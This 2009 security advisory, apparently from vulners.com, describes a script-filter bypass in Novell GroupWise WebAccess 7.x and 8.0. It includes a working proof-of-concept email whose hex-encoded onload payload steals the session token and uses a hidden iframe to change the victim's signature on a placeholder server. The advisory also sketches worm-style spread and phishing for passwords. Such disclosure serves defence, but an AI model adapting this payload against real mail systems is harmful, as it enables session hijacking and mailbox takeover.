Novell Groupwise fails to properly sanitize emails.

2009-05-2900:00:00

vulners.com

JSON

Affected product

Novell Groupwise webaccess
Affected software: 7.x and 8.0

Vulnerability details

Groupwise WebAccess implements a security parser designed to prevent embedded scripts in HTML emails from executing in the
users's browser.
Unfortunately this parser fails to recognize some unusual but valid syntaxes like the one used in the example shown below
allowing a maliciously crafted email to run its payload in the context of a user session.
All the configuration options of a user's mailbox, including proxy and rule lists, are therefore exposed to illegitimate
modification and will easily grant an attacker read/write access to the victim's mailbox.
A malicious code might be well designed like a worm and spread itself using its victims's address book taking over all of
a company's mailboxes one after another.
Even though the accounts's password can't be extracted or changed through direct call to the configuration tools,
other indirect attacks are still available like using a fake relogin page prompting victims to give up their password.

Following harmless code uses an onload() event handler to bootstrap its payload as soon as the email is open.
The first stage of this script extracts the session token (User.Context) from within the current document's URI and used
to make up the second stage.
The second injects an iframe in the current page which in turn calls the signature configuration interface and changes the
user's signature on the fly.
This example uses a fake target, 'gwwa.victim.com' that must be changed with a real server addresss/name.
Here, the security parser won't recognize "onload = 'javascript:…" as potentially unsafe just because of the space
characters.

<!–
<html>
<head>
</head>
<body onmouseover = 'return false;' onload = 'javascript:var context=document.location.href;var
token=context.replace(/^.+context=([a-z0-9]+).+$/i,"$1");
var
malwareS1="%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%62%72%2F%3E%3C%62%72%2F%3E%4E%6F%77%20%63%68%65%63%6B%20%79%6F%75%72%20%73%69%67%6E%61%74%75%72%65%20%2E%2E%2E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%77%77%61%2E%76%69%63%74%69%6D%2E%63%6F%6D%2F%67%77%2F%77%65%62%61%63%63%3F%55%73%65%72%2E%63%6F%6E%74%65%78%74%3D";
var
malwareS2="%26%61%63%74%69%6F%6E%3D%53%69%67%6E%61%74%75%72%65%2E%4D%6F%64%69%66%79%26%6D%65%72%67%65%3D%73%69%67%6E%61%74%75%72%26%53%69%67%6E%61%74%75%72%65%2E%69%73%45%6E%61%62%6C%65%64%3D%65%6E%61%62%6C%65%64%26%53%69%67%6E%61%74%75%72%65%2E%69%73%41%75%74%6F%6D%61%74%69%63%3D%61%75%74%6F%6D%61%74%69%63%26%53%69%67%6E%61%74%75%72%65%2E%73%69%67%6E%61%74%75%72%65%3D%25%32%30%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%25%30%64%25%30%61%25%30%64%25%30%61%30%77%6E%65%64%2E%22%20%77%69%64%74%68%3D%30%70%78%20%68%65%69%67%68%74%3D%30%70%78%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E";
document.write(unescape(malwareS1)+token+unescape(malwareS2));return false;'>
<br/>
<br/><br/>Now check your signature …
</body>
</html>
–>